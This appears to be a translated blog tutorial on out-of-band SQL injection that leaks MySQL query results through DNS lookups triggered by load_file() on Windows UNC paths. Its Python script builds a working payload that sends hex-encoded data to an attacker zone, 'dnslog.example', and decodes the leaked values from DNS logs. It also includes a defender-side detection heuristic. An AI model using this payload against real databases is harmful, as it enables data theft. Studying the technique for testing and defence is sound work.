Using some database functions to initiate DNS resolution for SQL injection

Source: Internet
Author: User
Tags: sql injection methods


First, a standard description of the SQL injection types, to fix the terminology.

An earlier post listed four SQL injection methods. That split is not quite right. More precisely, SQL injection falls into the following three classes.

Inband

Inband techniques use the channel that already exists between the attacker and the vulnerable web application to extract data. Usually that channel is the ordinary web server response. The union-based technique appends the result of the malicious SQL query to the output of an existing page, while the error-based technique makes the DBMS put the result of a specific malicious query into an error message.

Inference

With inference techniques the attacker infers data values from differences in the application's behaviour (page content or response time). The result of the malicious query is extracted one bit or one character at a time, without the data itself ever being transmitted back. This is what is usually called blind injection.

Out-of-band (OOB)

In contrast to inband, the data leaves through a different transport, for example HTTP or DNS. When detailed error messages are disabled, results are limited or filtered, egress filtering is lax, and/or keeping the number of queries small matters, inference looks like the only option; OOB offers a more convenient one.

A table comparing the efficiency of the techniques appeared here (an image; not reproduced in this copy).
DNS exfiltration, as expected, is slower than the fastest inband technique (error-based) but faster than the fastest inference technique (boolean-based blind injection). What we need to understand here is SQL injection that uses DNS resolution as the out-of-band channel.

// My own rough take: whether it is the error-based technique of the inband class or the OOB technique, the core idea is the same. The query expression is passed as an argument to some function that evaluates it, and the result comes back either through an error message or through a remote access. Either way the data value is read directly instead of being guessed.

Start with DNS resolution. When a client needs to look up a network name used by a program, it queries a DNS server. The query can be answered in several ways:

1. If the same query has already been answered before, the client can answer it from its local cache.

2. The DNS server can answer from its own cache and/or from the zone records it holds.

3. The DNS server can also forward the query to other DNS servers on behalf of the requesting client until the name is fully resolved, then return the answer to the client; this is called recursion. (If the server instead only refers the client to other servers and lets the client ask them itself, that is iteration.)

// So the core of the problem is to find a database function that accepts a remote address or initiates a network request. With such a function the result of the query expression can be carried out in the request itself.

This makes the problem much clearer.

Here I tested the load_file() function.

On Windows, this function can be made to open a UNC path such as \\10.211.55.3\ipc$. (The leading \\ here is not shorthand for http://.

// To be precise: // abbreviates http://, whereas \\ is the file:\\ form. So on Windows it is the file:\\ UNC path that triggers the DNS lookup: before the share can be opened over SMB, the host part of the path has to be resolved.)

So the target environment is demanding: the MySQL server has to run on Windows, and the database account needs the FILE privilege that load_file() requires (the article assumes root, which has it). Keep in mind that MySQL's secure_file_priv setting can further restrict what load_file() is allowed to open.

The first screenshot (not reproduced here) shows only the result of the concat() call, that is, the UNC path assembled from the query output.

After load_file() is called on that path, the DNS server receives a resolution request for the hostname it contains.

(Excuse the rough screenshot. Note the four backslashes in it: they are there for escaping, since each backslash in a MySQL string literal must be doubled, so the four characters in the literal become the two leading backslashes of the UNC path.)
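The payload construction and the decoding of the resulting lookups, as an added Python example (this is not code from the original article). It assumes an attacker-controlled zone dnslog.example, a share path share\x and a BIND-style query-log format; the log lines are constructed for the example. It reproduces the four-backslash escaping from the screenshot note, and goes a little beyond the article by splitting long results into several DNS labels and by adding the check a defender would run over query logs.

```python
"""DNS exfiltration through MySQL load_file() and a UNC path.

Added example, not code from the original article. It builds the injected
expression, shows which hostname Windows will resolve for it, and decodes the
resulting queries from DNS-server log lines. The zone dnslog.example, the
share path and the log format are assumptions made for illustration.
"""
import re

ATTACKER_ZONE = "dnslog.example"   # assumed attacker-controlled zone
CHUNK = 62  # hex characters per label: RFC 1035 allows 63, but an even
            # count keeps every label on a whole-byte boundary


def sql_string(s: str) -> str:
    """Quote s as a MySQL string literal. Backslashes are doubled, which is
    why the two real backslashes of the UNC prefix appear as four in the SQL."""
    return "'" + s.replace("\\", "\\\\").replace("'", "''") + "'"


def build_payload(expr: str, labels: int = 3) -> str:
    """Return the load_file() call that leaks the value of the SQL expression.

    hex() keeps only characters legal in a hostname, substr() splits the hex
    text into `labels` chunks, and nullif() turns an empty trailing chunk
    into NULL so concat_ws() drops it instead of emitting an empty label.
    """
    chunks = ", ".join(
        f"nullif(substr(hex({expr}),{i * CHUNK + 1},{CHUNK}),'')"
        for i in range(labels)
    )
    host = f"concat_ws('.', {chunks}, {sql_string(ATTACKER_ZONE)})"
    return (f"load_file(concat({sql_string(chr(92) * 2)}, {host}, "
            f"{sql_string(chr(92) + 'share' + chr(92) + 'x')}))")


def expected_unc_path(value: bytes, labels: int = 3) -> str:
    """The UNC path MySQL builds for build_payload() when expr yields value."""
    h = value.hex().upper()  # MySQL hex() returns upper-case digits
    parts = [h[i:i + CHUNK] for i in range(0, len(h), CHUNK)][:labels]
    return "\\\\" + ".".join(parts + [ATTACKER_ZONE]) + "\\share\\x"


def unc_host(path: str) -> str:
    """Hostname Windows resolves when opening a UNC path (two leading
    backslashes, then the host, then the share)."""
    m = re.fullmatch(r"\\\\([^\\]+)\\.*", path)
    if not m:
        raise ValueError("not a UNC path")
    return m.group(1)


# Constructed BIND-style query-log lines. The first carries hex("5.7.26-log"),
# the name a leaked @@version would produce; the third carries hex("root@localhost").
LOG_LINES = """\
client 10.211.55.3#52344: query: 352E372E32362D6C6F67.dnslog.example IN A +
client 10.211.55.3#52345: query: time.windows.com IN A +
client 10.211.55.3#52346: query: 726F6F74406C6F63616C686F7374.dnslog.example IN A +
"""
QUERY_RE = re.compile(r"query: (\S+) IN ")
HEX_LABEL = re.compile(r"^[0-9A-Fa-f]{20,63}$")


def decode_exfil(log_text: str, zone: str = ATTACKER_ZONE) -> list[bytes]:
    """Recover leaked values from the queries under zone, in log order."""
    out = []
    for m in QUERY_RE.finditer(log_text):
        name = m.group(1).rstrip(".")
        if not name.endswith("." + zone):
            continue
        hexdata = name[: -len(zone) - 1].replace(".", "")
        try:
            out.append(bytes.fromhex(hexdata))
        except ValueError:      # truncated or non-hex label: skip it
            continue
    return out


def looks_like_hex_exfil(name: str) -> bool:
    """Defender-side heuristic: a queried name containing a long all-hex
    label deserves a look even when the attacker's zone is unknown."""
    return any(HEX_LABEL.match(label) for label in name.split("."))


if __name__ == "__main__":
    print(build_payload("@@version"))
    print(expected_unc_path(b"5.7.26-log"))
    print(decode_exfil(LOG_LINES))
```

The injected expression only fires a lookup if the MySQL host is Windows and the account may call load_file(); the data itself rides in the hostname, so anything that is not a hostname-safe character has to be hex-encoded, which is why the total leaked length per query is limited by the label and name length limits of DNS.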
